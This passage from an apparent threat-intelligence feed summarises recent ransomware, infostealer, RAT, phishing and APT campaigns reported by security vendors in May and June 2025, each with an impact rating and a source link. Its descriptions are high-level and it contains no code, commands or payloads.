CYFIRMA researchers have identified Lyrix Ransomware, a Python-based malware compiled with PyInstaller, targeting Windows operating systems. First observed on April 20, 2025, Lyrix employs strong AES encryption, appends a '.02dq34jROu' extension to encrypted files, and utilizes advanced evasion techniques such as anti-VM checks (via VirtualProtect) and process manipulation (GetCurrentProcess, TerminateProcess). The financially motivated attackers issue ransom demands, threaten to leak stolen data from user directories like Downloads and Documents, and attempt to cripple system recovery by deleting Volume Shadow Copies and disabling WinRE. The malware's discovery on underground forums and the ProtonMail contact address creation in April 2025 indicate recent actor activity.
Source: https://www.cyfirma.com/research/lyrix-ransomware/
2025-06-01
New_AsyncRAT_Campaign_Targets_Italian_Users
LOW
Intel Source:
CERT-AGID
Intel Name:
New_AsyncRAT_Campaign_Targets_Italian_Users
Date of Scan:
2025-06-01
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a phishing campaign targeting users in Italy leveraging AsyncRAT malware. The attack starts with an English-language email impersonating the legitimate company Arabian Construction Co, claiming the recipient is being considered as a potential supplier and inviting them to view a file. Instead of an attachment, the email includes a Box.com link to download a TAR file containing a hidden JavaScript file. When executed, the script runs PowerShell to download a DLL from Aruba Drive. The DLL checks whether it is running in a virtual machine, then downloads and executes AsyncRAT. This malware allows attackers to take control of infected machines, steal data and run commands remotely.
Source: https://cert-agid.gov.it/news/asyncrat-distribuito-in-italia-tramite-componenti-steganografici/
2025-06-01
DragonForce_Exploits_SimpleHelp_for_MSP_Attacks
MEDIUM
Intel Source:
Sophos
Intel Name:
DragonForce_Exploits_SimpleHelp_for_MSP_Attacks
Date of Scan:
2025-06-01
Impact:
MEDIUM
Summary:
Sophos researchers have uncovered that DragonForce ransomware operators are exploiting a chain of vulnerabilities (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) in SimpleHelp remote monitoring and management (RMM) software, released in January 2025. The attackers target Managed Service Providers (MSPs) to gain access to their environments and those of their clients. In one investigated case, the threat actors compromised an MSP’s SimpleHelp instance, mapped connected customer environments, and deployed DragonForce ransomware across multiple systems. They also exfiltrated sensitive data to enable double extortion tactics. Active since mid-2023, DragonForce operates as a Ransomware-as-a-Service (RaaS) platform with a growing affiliate base, including members linked to groups like Scattered Spider, presenting a serious supply chain threat to organizations reliant on MSPs.
Source: https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/
2025-06-01
Void_Blizzard_Espionage_Targets_Critical_Sectors
HIGH
Intel Source:
Microsoft
Intel Name:
Void_Blizzard_Espionage_Targets_Critical_Sectors
Date of Scan:
2025-06-01
Impact:
HIGH
Summary:
Microsoft researchers have disclosed details of Void Blizzard (also LAUNDRY BEAR), a Russia-affiliated actor active since at least April 2024, conducting cyberespionage operations against organizations crucial to Russian government objectives, primarily in Europe and North America. Targets include government, defense, transportation, media, NGOs, and healthcare sectors, with a disproportionate focus on NATO member states and Ukraine. Void Blizzard initially gained access by using stolen credentials, likely procured from infostealer ecosystems, to access Exchange and SharePoint Online for large-scale email and file exfiltration. As of April 2025, the actor evolved tactics to include adversary-in-the-middle (AitM) spear phishing, using typosquatted domains and the Evilginx framework to spoof Microsoft Entra authentication and steal credentials and session cookies.
Source: https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/
2025-05-31
MSHTA_LOLBin_Delivers_Obfuscated_Infostealer
MEDIUM
Intel Source:
LevelBlue
Intel Name:
MSHTA_LOLBin_Delivers_Obfuscated_Infostealer
Date of Scan:
2025-05-31
Impact:
MEDIUM
Summary:
LevelBlue's analysis, published May 27, 2025, details an emerging threat involving multi-stage malware delivery initiated by mshta.exe, a native Windows LOLBin. Attackers leverage MSHTA to fetch an initially disguised .tmp file, hosted on cloud infrastructure like Alibaba Cloud Object Storage, which contains heavily obfuscated VBScript. This script employs techniques like XOR and Base64 encoding to deobfuscate and execute subsequent PowerShell payloads via WMI, ultimately leading to the deployment of a sophisticated infostealer.
Source: https://levelblue.com/blogs/security-essentials/hunting-malware-with-mshta-and-cyberchef
2025-05-31
Fake_Agenzia_Entrate_Refund_Scam
LOW
Intel Source:
CERT-AGID
Intel Name:
Fake_Agenzia_Entrate_Refund_Scam
Date of Scan:
2025-05-31
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a phishing campaign impersonating Italy’s Revenue Agency (Agenzia delle Entrate), in which threat actors distribute fake refund emails to trick recipients into entering personal and credit card information on a fraudulent website. The Ministry of Economy and Finance (MEF) has been notified, and efforts are underway to take down the malicious domain.
Source: https://cert-agid.gov.it/wp-content/uploads/2025/05/phishing_AdE_2.json
2025-05-31
Stealthy_WooCommerce_Formjacking_Malware
LOW
Intel Source:
Wordfence
Intel Name:
Stealthy_WooCommerce_Formjacking_Malware
Date of Scan:
2025-05-31
Impact:
LOW
Summary:
The Wordfence researchers have identified a sophisticated formjacking malware targeting e-commerce sites using WooCommerce. Active since at least April 2025, this malware injects a convincing, fake payment form into the checkout process to steal sensitive customer data, including full card details and personal information. Attackers achieve initial access likely through compromised WordPress administrator accounts, then inject the malicious JavaScript via custom code plugins. The malware stealthily captures data by continuously monitoring billing fields and storing it in the browser's localStorage for persistence across sessions and resilience against network interruptions. Upon the customer clicking "Place Order," the script exfiltrates the collected data to a remote command-and-control server using the navigator.sendBeacon() method, which avoids user awareness and common detection triggers.
Source: https://www.wordfence.com/blog/2025/05/sophisticated-stealthy-formjacking-malware-targets-e-commerce-checkout-pages/
2025-05-30
Mimo_Exploits_Craft_CMS_for_Cryptomining
LOW
Intel Source:
Sekoia
Intel Name:
Mimo_Exploits_Craft_CMS_for_Cryptomining
Date of Scan:
2025-05-30
Impact:
LOW
Summary:
Researchers at Sekoia have identified a group called Mimo that has been active since at least March 2022, exploiting a newly disclosed vulnerability (CVE-2025-32432) in the Craft content management system to break into servers. After gaining access, the attackers, believed to be based in Turkey, install a backdoor that allows remote access to a compromised server and run a script named 4l4md4r.sh to download a program written in Go. This program installs both a cryptominer called XMRig and a tool called IPRoyal, used to exploit the victim's internet bandwidth. They also use advanced techniques like LD_PRELOAD hijacking, which helps hide their malicious activity on the system.
Source: https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/
2025-05-30
ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor
MEDIUM
Intel Source:
Elastic Security Labs
Intel Name:
ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor
Date of Scan:
2025-05-30
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have discovered DOUBLELOADER, a newly identified backdoor malware often found in conjunction with the RHADAMANTHYS infostealer. This malware duo is notably protected by the ALCATRAZ open-source obfuscator, which has been in use since January 2023 by both cybercriminal groups and APT actors. DOUBLELOADER has been active since at least December 2024 and leverages ALCATRAZ to complicate binary analysis and extend its operational lifespan. DOUBLELOADER performs direct system calls for tasks such as injecting code into the explorer.exe process, gathering host system information, and communicating with a hardcoded command-and-control server for updates. The ALCATRAZ obfuscator enhances evasion by applying multiple layers of protection, including control flow flattening, instruction mutation, constant unfolding, LEA constant hiding, anti-disassembly techniques, and entrypoint obfuscation. These obfuscation methods are frequently embedded within a custom PE section named .0Dev.
Source: https://www.elastic.co/security-labs/deobfuscating-alcatraz
2025-05-30
Fancy_Bear_SpyPress_XSS_Campaign
MEDIUM
Intel Source:
PolySwarm
Intel Name:
Fancy_Bear_SpyPress_XSS_Campaign
Date of Scan:
2025-05-30
Impact:
MEDIUM
Summary:
PolySwarm researchers have uncovered Operation RoundPress, an ongoing cyberespionage campaign attributed to the Russia-aligned threat group Fancy Bear, active since 2023 and expanding through 2024. The operation leverages SpyPress, a malicious JavaScript payload delivered through spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities, including zero-days like CVE-2024-11182 in MDaemon, within webmail platforms such as Roundcube, Horde, and Zimbra. The campaign primarily targets Ukrainian government agencies, Eastern European defense contractors, and government organizations across Africa, the EU, and South America.
Source: https://blog.polyswarm.io/fancy-bears-spypress-malware
2025-05-30
Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra
MEDIUM
Intel Source:
Qianxin Threat Intelligence Center
Intel Name:
Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra
Date of Scan:
2025-05-30
Impact:
MEDIUM
Summary:
Researchers at Qianxin have uncovered substantial overlaps in infrastructure and tooling between two advanced persistent threat (APT) groups: Maha Grass (APT-Q-36) and Brain Worm (APT-Q-38). Both groups are active in cyber espionage operations targeting organizations across South Asia and the broader Asian region. Since late February 2025, Brain Worm has been observed using a malware-hosting domain that was also recently associated with a Spyder downloader variant deployed by Maha Grass. A notable connection between the two groups is the use of the same digital signature "Ebo Sky Tech Inc" on malware samples, but applied on different dates: January 28 for Brain Worm and February 16 for Maha Grass. Both groups rely on spear-phishing attacks using malicious PowerPoint files embedded with VBA macros. These macros deliver an initial payload that subsequently downloads additional components, including DLL files and the Spyder downloader. The Spyder variant employed by both APTs features XOR-encrypted configurations, establishes persistence via scheduled tasks, remaps system DLLs, and exfiltrates data using Base64-encoded JSON payloads embedded in custom HTTP headers. To evade detection, the malware disguises its command-and-control (C2) traffic as legitimate network communication, spoofing well-known services such as GitHub.
Source: https://mp.weixin.qq.com/s/pJTPeK1Cam5n4RUElWzb2Q
2025-05-29
Danabot_MaaS_Disruption_and_Analysis
MEDIUM
Intel Source:
ESET Research
Intel Name:
Danabot_MaaS_Disruption_and_Analysis
Date of Scan:
2025-05-29
Impact:
MEDIUM
Summary:
According to ESET Research, the Danabot Malware-as-a-Service (MaaS) operation, an infostealer and banking trojan active since 2018, was recently disrupted by a multinational law enforcement effort, Operation Endgame, in May 2025. The Danabot group, including individuals identified as JimmBee and Onix, provided affiliates with tools to steal financial data, deploy secondary malware like ransomware, and conduct DDoS attacks against global victims, with early campaigns targeting Australia and Poland. Attackers distributed Danabot via spam, malicious Google Ads, and deceptive websites tricking users into executing malware on Windows systems.
Source: https://www.welivesecurity.com/en/eset-research/danabot-analyzing-fallen-empire/
2025-05-29
Operation_Endgame_2_0
MEDIUM
Intel Source:
Zscaler
Intel Name:
Operation_Endgame_2_0
Date of Scan:
2025-05-29
Impact:
MEDIUM
Summary:
Zscaler researchers have observed that law enforcement agencies have released information about an ongoing coordinated effort under “Operation Endgame”, a joint campaign aimed at seizing and taking down DanaBot infrastructure, primarily within the United States. This operation has already disrupted several malware families like SmokeLoader, IcedID, Pikabot, and Bumblebee, and now includes actions against DanaBot. DanaBot is sold on underground forums as a Malware-as-a-Service (MaaS). Its primary functions include stealing sensitive data, injecting malicious content into web browsers and deploying additional malware such as ransomware and remote access trojans. Notably, DanaBot can capture keystrokes, take screenshots, record the screen, and even access the victim’s system remotely. DanaBot's communications with C2 servers use strong encryption and utilize Tor to anonymize and secure these connections.
Source: https://www.zscaler.com/blogs/security-research/operation-endgame-2-0-danabusted
2025-05-29
Chihuahua_Infostealer
LOW
Intel Source:
Picussecurity
Intel Name:
Chihuahua_Infostealer
Date of Scan:
2025-05-29
Impact:
LOW
Summary:
Researchers at Picus Security have uncovered a .NET-based malware called Chihuahua Infostealer, which emerged in April 2025 and targets browser credentials and cryptocurrency wallet data. The malware, likely created by Russian-speaking developers, begins with social engineering that tricks victims into executing a malicious PowerShell script, often delivered through trusted platforms like Google Drive. This script starts a multi-stage infection chain involving a Base64-encoded payload, followed by a second-stage script that sets up a scheduled task for persistence and further payload execution. The final .NET payload is downloaded from OneDrive and runs directly in memory to evade detection. The infection chain steals data from various browsers and cryptocurrency wallets. The stolen data is encrypted and exfiltrated over HTTPS, while local evidence of the attack is erased.
Source: https://www.picussecurity.com/resource/blog/chihuahua-stealer-malware-targets-browser-and-wallet-data
2025-05-28
Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability
Date of Scan:
2025-05-28
Impact:
MEDIUM
Summary:
EclecticIQ researchers have identified that a China-nexus threat actor tracked as UNC5221 is actively exploiting two critical Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities (CVE-2025-4427 and CVE-2025-4428). The attackers are targeting internet-facing EPMM systems across critical sectors in Europe, North America, and the Asia-Pacific. They gain initial access through unauthenticated remote code execution, using Java Reflection to execute commands. Post-exploitation, they deploy the KrustyLoader malware, which downloads a hidden second-stage payload from AWS storage. This malware decrypts and injects itself directly into system memory to maintain long-term access. The threat actors then leverage MySQL credentials to access the EPMM database and exfiltrate sensitive data, including authentication credentials, device details, and Office 365 tokens. They also use a tool called FRP (Fast Reverse Proxy) for network reconnaissance and lateral movement.
Source: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability
2025-05-28
TAG_110_Targets_Tajikistan_Entities
MEDIUM
Intel Source:
Recorded Future
Intel Name:
TAG_110_Targets_Tajikistan_Entities
Date of Scan:
2025-05-28
Impact:
MEDIUM
Summary:
Researchers at Insikt Group have uncovered a phishing campaign conducted by the Russian threat actor TAG-110, targeting government, educational, and research institutions in Tajikistan. In this campaign, the threat actor has changed tactics by leveraging macro-enabled Word template files (.dotm) to gain initial access and persistence instead of deploying the HTA-based payload named HATVIBE. These VBA-enabled templates are embedded within government-themed documents. When the recipient opens the document, the malware copies itself to the Word STARTUP folder, allowing it to run automatically every time Word is opened. It collects system information and sends it to a C2 server. This campaign focused on intelligence gathering related to government operations, military affairs, and political events such as elections to support Russian strategic interests in Central Asia.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2025-0522.pdf
2025-05-28
Operation_Sindoor
LOW
Intel Source:
Seqrite
Intel Name:
Operation_Sindoor
Date of Scan:
2025-05-28
Impact:
LOW
Summary:
Researchers from Seqrite Labs have uncovered multiple cyber attacks linked to Operation Sindoor, involving both state-sponsored and hacktivist groups. The campaign is associated with the Pakistan-aligned threat groups APT36 and SideCopy and targeted critical Indian sectors such as defense, government IT systems, healthcare, telecom, and education. It involved spear phishing with malicious documents (macros, shortcuts, scripts) that deployed the Ares malware for espionage, while hacktivist groups launched DDoS attacks, defaced websites, and leaked stolen data. The operation also leveraged spoofed domains mimicking military and government entities to spread false information and cause disruption.
Source: https://www.seqrite.com/blog/operation-sindoor-anatomy-of-a-digital-siege/
2025-05-27
APT_Spear_Phishing_Surge_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
APT_Spear_Phishing_Surge_in_Korea
Date of Scan:
2025-05-27
Impact:
LOW
Summary:
ASEC researchers have discovered an increase in Advanced Persistent Threat (APT) attacks in South Korea during April 2025, with spear phishing identified as the most common infiltration method. Targeted phishing attacks use thorough reconnaissance, spoofed sender addresses, and malware attachments or links to trick recipients. AhnLab identified a particular variation involving LNK files, in which attackers distributed CAB-compressed malicious scripts encoded in LNK files carrying PowerShell commands. When launched, these scripts can extract decoy documents, leak system information, and install other malware on the victim's computer.
Source: https://asec.ahnlab.com/en/87945/
2025-05-27
Amos_Stealer_Targeting_macOS_Users
LOW
Intel Source:
motuariki (X)
Intel Name:
Amos_Stealer_Targeting_macOS_Users
Date of Scan:
2025-05-27
Impact:
LOW
Summary:
Security researcher motuariki has disclosed additional Command and Control (C2) infrastructure and sample hashes associated with the Amos Stealer, a known macOS malware. The shared C2 endpoint was listed alongside other similar IP-based C2s. This ongoing activity signifies a persistent threat from Amos Stealer targeting macOS users for credential and data theft.
Source: https://x.com/motuariki_/status/1924330564880159165
2025-05-26
Bumblebee_Spread_via_Bing_SEO_Poisoning
MEDIUM
Intel Source:
CYJAX
Intel Name:
Bumblebee_Spread_via_Bing_SEO_Poisoning
Date of Scan:
2025-05-26
Impact:
MEDIUM
Summary:
Cyjax researchers have identified a new Bumblebee malware distribution campaign that exploits Bing SEO poisoning. The attackers target users searching for software like WinMTR and Milestone XProtect by creating fake download sites. These sites, hosted on a Truehost Cloud server in Nairobi, rank highly in Bing search results and deliver trojanized MSI installers from an external domain. When executed via msiexec.exe, the installer drops both legitimate software components and malicious files, including a tampered version.dll and icardagt.exe. The executable loads the malicious DLL, leading to the deployment of the Bumblebee malware. Once active, Bumblebee connects to command-and-control (C2) domains using unique 13-character strings followed by a .life TLD. The campaign appears to be an evolution of a similar 2023 SEO poisoning strategy and is now focused on targeting less mainstream software tools often used in technical development environments.
Source: https://www.cyjax.com/resources/blog/a-sting-on-bing-bumblebee-delivered-through-bing-seo-poisoning-campaign/
2025-05-26
ViciousTrap_Edge_Device_Honeypot_Network
LOW
Intel Source:
Sekoia
Intel Name:
ViciousTrap_Edge_Device_Honeypot_Network
Date of Scan:
2025-05-26
Impact:
LOW
Summary:
Researchers from Sekoia have identified ViciousTrap, an actor that has compromised over 5,500 edge devices globally since March 2025, primarily in Asia, to create a distributed honeypot network. Likely Chinese-speaking, ViciousTrap exploits vulnerabilities like CVE-2023-20118 in devices from over 50 brands, using a script (NetGhost) to redirect traffic from compromised systems to its Malaysia-based interception servers, enabling Man-in-the-Middle data collection on various monitored assets, including some in Taiwan and the US.
Source: https://blog.sekoia.io/vicioustrap-infiltrate-control-lure-turning-edge-devices-into-honeypots-en-masse/
2025-05-26
Phishing_Campaign_Abuses_jsDelivr
LOW
Intel Source:
Fortra
Intel Name:
Phishing_Campaign_Abuses_jsDelivr
Date of Scan:
2025-05-26
Impact:
LOW
Summary:
Researchers at Fortra have identified a phishing campaign targeting Microsoft O365 users. The attack begins with a phishing email containing an .htm file that hides AES-encrypted JavaScript code. Once decrypted, the script connects to a fake open-source package on npm, served through a CDN such as jsDelivr. This package then generates customized phishing links that include the victim’s email address. These links redirect the victim through multiple websites before landing on a fake Office 365 login page that steals their credentials.
Source: https://www.fortra.com/blog/threat-analysis-malicious-npm-package-leveraged-o365-phishing-attack
2025-05-25
MUT_9332_Targets_Solidity_Developers
MEDIUM
Intel Source:
Datadog
Intel Name:
MUT_9332_Targets_Solidity_Developers
Date of Scan:
2025-05-25
Impact:
MEDIUM
Summary:
Datadog researchers have uncovered a campaign by the threat actor MUT-9332 targeting Solidity developers on Windows systems. The attackers leveraged deceptive VS Code extensions that appeared legitimate but secretly ran malicious code in the background. These malicious extensions, discovered between April and May 2025 before being removed from the Marketplace, initiated multi-stage infection chains involving obfuscated JavaScript, PowerShell scripts, and steganography to hide payloads within image files. Their primary goal was to steal sensitive information such as cryptocurrency wallet credentials and system information, and to deploy a remote access tool called Quasar RAT to give the attackers control over the victim’s system.
Source: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/
2025-05-25
PureRAT_Spam_Attacks_in_Russia
LOW
Intel Source:
Securelist
Intel Name:
PureRAT_Spam_Attacks_in_Russia
Date of Scan:
2025-05-25
Impact:
LOW
Summary:
Securelist researchers discovered an increase in attacks against Russian enterprises utilizing the Pure malware family, specifically PureRAT and PureLogs. This campaign has been active since March 2023, and it experienced a fourfold growth in early 2025 compared to the same period in 2024. The campaign, which is distributed via spam emails containing malicious RAR files or links, deceives users by using accounting-related file names and double extensions such as .pdf.rar.
Source: https://securelist.ru/purerat-attacks-russian-organizations/112619/
2025-05-24
Fake_Zoom_Invites_Steal_Credentials
LOW
Intel Source:
Spider Labs
Intel Name:
Fake_Zoom_Invites_Steal_Credentials
Date of Scan:
2025-05-24
Impact:
LOW
Summary:
SpiderLabs researchers have identified a phishing campaign targeting corporate users with fake Zoom meeting invitations designed to steal login credentials. The attackers leverage urgent, legitimate-looking emails to lure recipients into clicking malicious links. These links lead to deceptive Zoom pages that play pre-recorded videos, making it appear that a live meeting is in progress; after a fake disconnection message, the page asks users to enter their credentials on a fake login screen. Once entered, the stolen information is immediately sent to the attackers through Telegram. The primary objective of this campaign is to steal login credentials, which could lead to account takeovers.
Source: https://x.com/SpiderLabs/status/1924424257083179462
2025-05-23
W3LL_Phishing_Kit_Hits_Outlook_Users
MEDIUM
Intel Source:
Hunt.IO
Intel Name:
W3LL_Phishing_Kit_Hits_Outlook_Users
Date of Scan:
2025-05-23
Impact:
MEDIUM
Summary:
Researchers from Hunt.IO have discovered a phishing campaign leveraging the W3LL Phishing Kit to target Microsoft Outlook credentials. This Phishing-as-a-Service (PaaS) tool, initially identified by Group-IB in 2022 and available through the W3LL Store marketplace, enables attackers to conduct adversary-in-the-middle (AiTM) attacks to hijack session cookies and bypass multi-factor authentication. The observed campaign utilized an open directory on an IP address to host W3LL phishing kit components, including IonCube-obfuscated PHP files in folders named "OV6". The phishing lure involved a fake Adobe Shared File service webpage that, upon attempted login, sent credentials via a POST request, specifically to a /wazzy.php endpoint.
Source: https://hunt.io/blog/phishing-kit-targets-outlook-credentials
2025-05-23
PyBitmessage_Backdoor_Malware
LOW
Intel Source:
ASEC
Intel Name:
PyBitmessage_Backdoor_Malware
Date of Scan:
2025-05-23
Impact:
LOW
Summary:
ASEC researchers have identified a hidden backdoor that installs alongside a Monero cryptocurrency miner and leverages the PyBitmessage library for C2 communications. The initial malware decrypts and deploys both the coinminer and a fileless PowerShell-based backdoor that executes directly in memory and downloads additional malicious tools from GitHub or Russian file hosting services. The attacker’s primary motive is to exploit compromised systems for cryptocurrency mining while establishing persistent access through the backdoor for potential further attacks.
Source: https://asec.ahnlab.com/ko/88104/
2025-05-23
TA406_Targeting_Government_Entities_in_Ukraine
MEDIUM
Intel Source:
Proofpoint
Intel Name:
TA406_Targeting_Government_Entities_in_Ukraine
Date of Scan:
2025-05-23
Impact:
MEDIUM
Summary:
Researchers from Proofpoint have uncovered phishing campaigns run by the DPRK state-sponsored actor TA406, also known as Opal Sleet and Konni, targeting government entities in Ukraine. The campaigns focus on credential harvesting and malware deployment to collect intelligence related to the ongoing Russian invasion. The attackers impersonate members of a think tank and send fake Microsoft security alerts to trick people into opening malicious files in HTML, CHM, ZIP or LNK formats. These files execute a hidden PowerShell script that gathers host data, establishes persistence via autorun batch files, and sends the data to servers controlled by the attackers.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front
2025-05-22
Tycoon2FA_Phishing_Using_Malformed_URLs
MEDIUM
Intel Source:
SpiderLabs
Intel Name:
Tycoon2FA_Phishing_Using_Malformed_URLs
Date of Scan:
2025-05-22
Impact:
MEDIUM
Summary:
SpiderLabs researchers have identified that Tycoon2FA-linked phishing campaigns are targeting Microsoft 365 users. These campaigns leverage malformed URLs containing backslash characters (https:\\) instead of forward slashes. Despite this unconventional formatting, most web browsers still resolve these links, leading unsuspecting victims to credential harvesting pages. This technique is employed by threat actors to bypass email security filters and evade URL-based detection systems, ultimately aiming to steal Microsoft 365 credentials. The infrastructure observed involves domains hosted on services like Azure and Cloudflare Workers.
Source: https://x.com/SpiderLabs/status/1924486856902586689
2025-05-22
SEO_Poisoning_Infostealer_Trends
LOW
Intel Source:
ASEC
Intel Name:
SEO_Poisoning_Infostealer_Trends
Date of Scan:
2025-05-22
Impact:
LOW
Summary:
Researchers at ASEC have identified ongoing trends in Infostealer malware spread throughout April 2025, focusing on the continued use of crack and keygen disguises to entice victims. These threats, typically promoted by SEO poisoning to appear at the top of search results, included well-known Infostealers such as LummaC2, Vidar, and StealC.
Source: https://asec.ahnlab.com/en/88062/
2025-05-22
AutoIT_Based_AsyncRAT_Delivery_Chain
LOW
Intel Source:
ISC.SANS
Intel Name:
AutoIT_Based_AsyncRAT_Delivery_Chain
Date of Scan:
2025-05-22
Impact:
LOW
Summary:
Researchers at ISC.SANS have found a malware campaign that delivers a RAT through a dual-layer AutoIT script framework. The first executable downloads an AutoIT interpreter and a second obfuscated AutoIT script that decodes and executes commands using a custom Wales() function. Persistence is enabled using a custom shortcut in the Startup folder that runs JavaScript and initiates further execution. The final payload, injected into a jsc.exe process as a DLL called Urshqbgpm.dll, attempts to communicate with a known AsyncRAT C2 server and includes references to PureHVNC functionality.
Source: https://isc.sans.edu/diary/31960
2025-05-22
Confluence_Hit_by_ELPACO_Ransomware
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
Confluence_Hit_by_ELPACO_Ransomware
Date of Scan:
2025-05-22
Impact:
MEDIUM
Summary:
The DFIR Report researchers have observed that an unpatched, internet-facing Confluence server was compromised via CVE-2023-22527, leading to the deployment of ELPACO-team ransomware (a Mimic variant) approximately 62 hours later. The threat actor initially used the exploit to deploy a Metasploit payload and establish C2 via IP. Following initial access, the actor performed privilege escalation using RPCSS named pipe impersonation, created a local administrator account ("noname"), and installed AnyDesk for persistent remote access via a self-hosted server. Extensive discovery, including network scanning with SoftPerfect NetScan and attempted Zerologon exploitation, preceded credential harvesting using Mimikatz and Impacket's Secretsdump. Lateral movement was achieved using the compromised domain administrator credentials via Impacket wmiexec and RDP.
Source: https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/#indicators
2025-05-22
Koishi_Chatbot_Plugin_Steals_Messages
LOW
Intel Source:
Socket
Intel Name:
Koishi_Chatbot_Plugin_Steals_Messages
Date of Scan:
2025-05-22
Impact:
LOW
Summary:
Researchers at Socket have discovered a malicious npm package, koishi-plugin-pinhaofa, designed to exfiltrate data from Koishi chatbots. Marketed as a spelling auto-correct helper, the plugin, once installed, silently scans all chatbot messages for any eight-character hexadecimal string. Upon finding such a string, which could represent sensitive data like commit hashes, API tokens, or checksums, the plugin forwards the entire message content to a hardcoded QQ account (UIN: 1821181277) controlled by the threat actor, who uses the npm alias kuminfennel. This exposes any secrets or credentials embedded within or surrounding the trigger string. This activity represents a supply chain attack targeting chatbot frameworks, exploiting the trust developers place in community plugins and the unrestricted access these plugins often have within the bot process.
Source: https://socket.dev/blog/malicious-koishi-chatbot-plugin?utm_medium=feed
2025-05-21
PyPI_Backdoor_Targets_Developers
LOW
Intel Source:
Reversinglabs
Intel Name:
PyPI_Backdoor_Targets_Developers
Date of Scan:
2025-05-21
Impact:
LOW
Summary:
Researchers at ReversingLabs have uncovered a malicious Python package called "dbgpkg" on the PyPI repository, disguised as a debugging tool. Once installed by developers, it deploys a backdoor that allows attackers to execute malicious code and exfiltrate sensitive data. The malware uses Python function wrappers around the requests and socket modules to run code in the background that downloads a public key from Pastebin and uses a tool called Global Socket Tool to bypass firewalls and connect to the attacker’s server. This campaign is believed to be linked to Phoenix Hyena/DumpForums, which has been targeting Russian interests in support of Ukraine since 2022.
Source: https://www.reversinglabs.com/blog/backdoor-implant-discovered-on-pypi-posing-as-debugging-utility
2025-05-21
DBatLoader_Targeting_Turkish_Users
LOW
Intel Source:
ASEC
Intel Name:
DBatLoader_Targeting_Turkish_Users
Date of Scan:
2025-05-21
Impact:
LOW
Summary:
ASEC researchers have identified a phishing campaign targeting Turkish users with malware known as DBatLoader, also called ModiLoader. The attackers send phishing emails in the Turkish language impersonating bank transaction notifications, which contain a malicious RAR file with a BAT script. This initial BAT script executes DBatLoader, which then leverages a series of obfuscated batch scripts and legitimate Windows tools to hide its activity and bypass security systems in order to install SnakeKeylogger. This malware steals system information, keyboard input and clipboard data, and sends the stolen data to the attackers' Telegram-based C2 server.
Source: https://asec.ahnlab.com/ko/87980/
2025-05-20
Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms
MEDIUM
Intel Source:
Any.Run
Intel Name:
Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms
Date of Scan:
2025-05-20
Impact:
MEDIUM
Summary:
ANY.RUN researchers have analyzed the Tycoon 2FA Phishing-as-a-Service (PhaaS) platform, active since August 2023 and targeting Microsoft 365 and Gmail credentials, which has demonstrated continuous evolution in its anti-detection mechanisms. This AiTM phishing kit employs a multi-stage attack, starting with obfuscated JavaScript on a landing page, which performs several checks ("nomatch" decoy, domain comparison) before proceeding. It then uses Cloudflare Turnstile CAPTCHA (or other CAPTCHA services like reCAPTCHA and IconCaptcha in later variants) and C2 server queries to validate the user before delivering the core phishing content. Later stages involve further Base64/XOR obfuscation, encrypted payload delivery, and dynamic URL generation for data exfiltration to a C2 infrastructure often using .ru, .es, .su, .com, and .net TLDs. Notable new evasion techniques observed between December 2024 and May 2025 include debugger timing checks, debug environment detection (Selenium, PhantomJS), keystroke interception, context menu blocking, dynamic multimedia loading from legitimate CDNs for victim-tailored lures, invisible JavaScript obfuscation, custom fake page redirects, custom CAPTCHAs, browser fingerprinting, and AES encryption for payload obfuscation.
Source: https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/
2025-05-20
China_Nexus_State_Actors_Exploiting_SAP_Vulnerability
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
China_Nexus_State_Actors_Exploiting_SAP_Vulnerability
Date of Scan:
2025-05-20
Impact:
MEDIUM
Summary:
EclecticIQ researchers have uncovered that China-nexus state-sponsored groups such as UNC5221, UNC5174 and CL-STA-0048 are exploiting an unauthenticated file upload vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer. The threat actors leverage the resulting remote code execution to deploy malicious webshells, enabling command execution and the installation of additional payloads like KrustyLoader and the SNOWLIGHT RAT. They are targeting government and essential service organizations in the UK, US and Saudi Arabia, aiming to compromise critical infrastructure, exfiltrate sensitive data, and maintain persistence.
Source: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
2025-05-20
FrigidStealer_Malware
LOW
Intel Source:
Wazuh
Intel Name:
FrigidStealer_Malware
Date of Scan:
2025-05-20
Impact:
LOW
Summary:
Wazuh researchers have uncovered a new information-stealing malware named FrigidStealer, targeting macOS users since January 2025 and potentially linked to the EvilCorp syndicate. It is being distributed through fake browser update pages on compromised websites, tricking users into downloading a malicious disk image. Upon execution, the malware asks for the user’s password through an AppleScript pop-up to bypass macOS Gatekeeper, then registers itself as an application and ensures it runs every time the system starts. FrigidStealer exfiltrates sensitive data, including browser credentials, files, system information, and cryptocurrency wallet details, and secretly sends it to a remote server using DNS tunneling. It terminates its own process to evade detection.
